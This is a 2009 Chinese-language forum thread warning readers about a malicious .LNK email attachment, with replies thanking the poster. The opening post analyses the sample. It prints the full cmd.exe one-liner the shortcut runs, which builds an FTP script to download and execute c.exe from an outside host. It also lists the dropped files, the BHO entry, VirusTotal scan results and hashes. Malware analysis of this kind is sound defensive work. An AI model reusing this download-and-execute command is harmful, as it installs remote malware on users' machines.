捷克論壇 JKF

 找回密碼
 加入會員
搜尋
查看: 1687 | 回覆: 2 | 跳轉到指定樓層
doudou10722
王子 | 2009-2-6 13:25:23

昨天收到一封Yahoo寄來的郵件,標題為「love….超噴飯的」,郵件內文夾帶一個附件檔,副檔名為「LNK」,連同前幾天收到這類型的郵件,已經有很多封,此類型病毒應該已經流傳一陣子了,請各位小心。注意:記得將防毒軟體即時掃瞄設定為所有檔案皆掃瞄。
這封Yahoo郵件畫面,如下所示:

此LNK惡意檔案會執行下列命令:
%windir%\system32\cmd.exe /c echo ftp -s:c.c > c.bat&echo c.exe >> c.bat&echo del c.c >> c.bat&echo open www.as08.com > c.c&echo as08>>c.c&echo 888>>c.c&echo get c.exe >> c.c&echo bye >> c.c&c.bat&
此惡意程式執行之後,有下面的行為:
[DLL injection]
C:\WINDOWS\Help\F3C74E3FA248.dll
[Added file]
C:\WINDOWS\Help\F3C74E3FA248.dll
C:\WINDOWS\Help\F3C74E3FA248.exe
C:\WINDOWS\system32\c.bat
[Added COM/BHO]
{1DBD6574-D6D0-4782-94C3-69619E719765}-C:\WINDOWS\HELP\F3C74E3FA248.dll
此惡意程式執行後,有兩個惡意檔案的數位簽章竟然顯示是微軟檔案:


警政署提供的NPASCAN無法在VMWare環境中執行,畫面如下所示(本來想試試看效果勒,希望此工具能支援囉):

下列是 VirusTotal 掃瞄結果 (僅提供參考)(很慘吧):
檔案 超噴飯的.lnk-1 接收於 2009.02.04 12:03:05 (CET)
結果: 1/39 (2.56%)
反病毒引擎     版本     最後更新     掃瞄結果
a-squared     4.0.0.93     2009.02.04     -
AhnLab-V3     5.0.0.2     2009.02.04     -
AntiVir     7.9.0.71     2009.02.04     -
Authentium     5.1.0.4     2009.02.03     -
Avast     4.8.1281.0     2009.02.03     -
AVG     8.0.0.229     2009.02.03     -
BitDefender     7.2     2009.02.04     -
CAT-QuickHeal     10.00     2009.02.04     -
ClamAV     0.94.1     2009.02.04     -
Comodo     961     2009.02.03     -
DrWeb     4.44.0.09170     2009.02.04     -
eSafe     7.0.17.0     2009.02.01     -
eTrust-Vet     31.6.6341     2009.02.04     -
F-Prot     4.4.4.56     2009.02.03     -
F-Secure     8.0.14470.0     2009.02.04     -
Fortinet     3.117.0.0     2009.02.04     -
GData     19     2009.02.04     -
Ikarus     T3.1.1.45.0     2009.02.04     -
K7AntiVirus     7.10.617     2009.02.03     -
Kaspersky     7.0.0.125     2009.02.04     -
McAfee     5515     2009.02.03     -
McAfee+Artemis     5515     2009.02.03     -
Microsoft     1.4306     2009.02.04     -
NOD32     3825     2009.02.04     -
Norman     6.00.02     2009.02.03     -
nProtect     2009.1.8.0     2009.02.04     -
Panda     9.5.1.2     2009.02.03     -
PCTools     4.4.2.0     2009.02.03     -
Prevx1     V2     2009.02.04     -
Rising     21.15.20.00     2009.02.04     -
SecureWeb-Gateway     6.7.6     2009.02.04     -
Sophos     4.38.0     2009.02.04     Mal/DownLnk-A
Sunbelt     3.2.1835.2     2009.01.16     -
Symantec     10     2009.02.04     -
TheHacker     6.3.1.5.246     2009.02.04     -
TrendMicro     8.700.0.1004     2009.02.04     -
VBA32     3.12.8.12     2009.02.04     -
ViRobot     2009.2.4.1589     2009.02.04     -
VirusBuster     4.5.11.0     2009.02.03     -
附加訊息
File size: 2083 bytes
MD5…: 52eb43f19995f08732051ca7a9aec424
SHA1..: f5e20a2460dced6834c182b133b1aefe178dc51c
SHA256: b83f2cf1cd7d7d0ad6af95a4374aadb6fa94f455eb98eba2c39ef49533cc4637
SHA512: 18ad6cbd80dfcc7116b4a90e20d7d949da20a8d4bd3459cf46e791c62557468a
ec827764343917d2e554869b4baf3cc237f149030ebd929062bd2e4f927d5a52
ssdeep: 24:8S2Pj0j8A5aYef2XwGBvhHIwb+4o0KJi8OhKR1Xt0fqmtW1XuxKlEi9J:8Si0
f5cGAwFoIhpg+xy
PEiD..: -
TrID..: File type identification
Windows Shortcut (100.0%)
PEInfo: -
小紅傘線上分析的結果(下一次病毒碼更新,會包含此惡意程式特徵碼):

評分

已有 1 人評分名聲 收起 理由
y903052001 + 10

總評分: 名聲 + 10   查看全部評分

回覆 使用道具
kgjo3280
侯爵 | 2009-2-6 13:36:28

感謝大大的提醒!!我奇摩信箱不認識的 標題很瞎的
都不會去點!!:o

評分

已有 1 人評分名聲 J幣 收起 理由
doudou10722 + 20 + 20 我很認同加分獎勵!

總評分: 名聲 + 20  J幣 + 20   查看全部評分

回覆 使用道具
kemerlin
大公爵 | 2010-5-31 12:13:02

這惡意檔案真夠厲害的
還可以假裝是微軟簽章
回覆 使用道具
您需要登入後才可以回覆 登入 | 加入會員

回頂部 下一篇文章 放大 正常倒序 快速回覆 回到列表